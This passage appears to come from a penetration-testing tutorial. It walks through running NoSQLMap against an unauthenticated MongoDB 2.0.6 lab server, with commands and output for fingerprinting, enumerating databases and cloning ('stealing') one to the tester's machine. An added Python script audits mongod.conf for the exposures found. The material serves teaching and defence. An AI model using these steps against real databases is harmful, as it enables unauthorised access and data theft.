3.7.1 Starting NoSQLMap
cd /opt/NoSQLMap
python nosqlmap.py
• Select 1-Set options
- Set the target host IP option (the IP of your MongoDB)
- Set the local MongoDB/Shell IP (your IP)
- b : save the options file
- x : exit
• Select 2-NoSQL DB Access Attacks
Once the attack has started, output like the following appears.
DB Access attacks (MongoDB)
=================
Checking to see if credentials are needed...
Successful access with no credentials!
MongoDB web management open at http://192.168.199.128:28017. No authentication required!
Start tests for REST Interface (y/n)? y
REST interface not enabled.
1-Get Server Version and Platform
2-Enumerate Databases/Collections/Users
3-Check for GridFS
4-Clone a Database
5-Launch Metasploit Exploit for Mongo < 2.2.4
6-Return to Main Menu
Select an attack: 1
Server Info:
MongoDB Version: 2.0.6
Debugs enabled: False
Platform: 32 bit
Select an attack: 2
List of databases:
local
admin
users
appUserData
Select an attack: 4
Select a database to steal: 5
Does this database require credentials (y/n)? n
Database cloned. Copy another (y/n)? n
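The findings in the output above (access with no credentials, web management open on port 28017) come from server settings that can be checked directly. The following Python is an added example, not code from the book or from NoSQLMap: it audits a legacy INI-style mongod.conf, the format used by MongoDB 2.0.x, for those settings. The function names and sample configs are constructed for illustration, and unset keys are assumed to take the 2.0.x defaults (auth off, HTTP interface on, listening on all interfaces).

```python
"""Audit a legacy (INI-style) mongod.conf for the exposures NoSQLMap reported."""
TRUE_VALUES = {"true", "1", "yes", "on"}


def parse_conf(text):
    """Parse 'key = value' lines; '#' starts a comment. Keys are lower-cased."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip().lower()] = value.strip()
    return settings


def audit(text):
    """Return findings, assuming MongoDB 2.0.x defaults for keys that are unset."""
    conf = parse_conf(text)

    def is_true(key):
        return conf.get(key, "").lower() in TRUE_VALUES

    findings = []
    if not is_true("auth") or is_true("noauth"):
        findings.append("auth disabled: clients connect with no credentials")
    if not is_true("nohttpinterface"):
        # The HTTP management interface listens on the main port + 1000.
        port = int(conf.get("port", "27017")) + 1000
        findings.append(f"HTTP management interface open on port {port}")
    if is_true("rest"):
        findings.append("REST interface enabled")
    binds = [b.strip() for b in conf.get("bind_ip", "").split(",")]
    if "" in binds or "0.0.0.0" in binds:
        findings.append("listening on all interfaces (bind_ip unset or 0.0.0.0)")
    return findings


# Constructed sample configs, not taken from the target shown in the text.
WEAK_CONF = "dbpath = /var/lib/mongodb\nport = 27017\n"
HARDENED_CONF = """
bind_ip = 127.0.0.1   # or a management-network address
auth = true
nohttpinterface = true
"""

if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit(text) or "no findings")
```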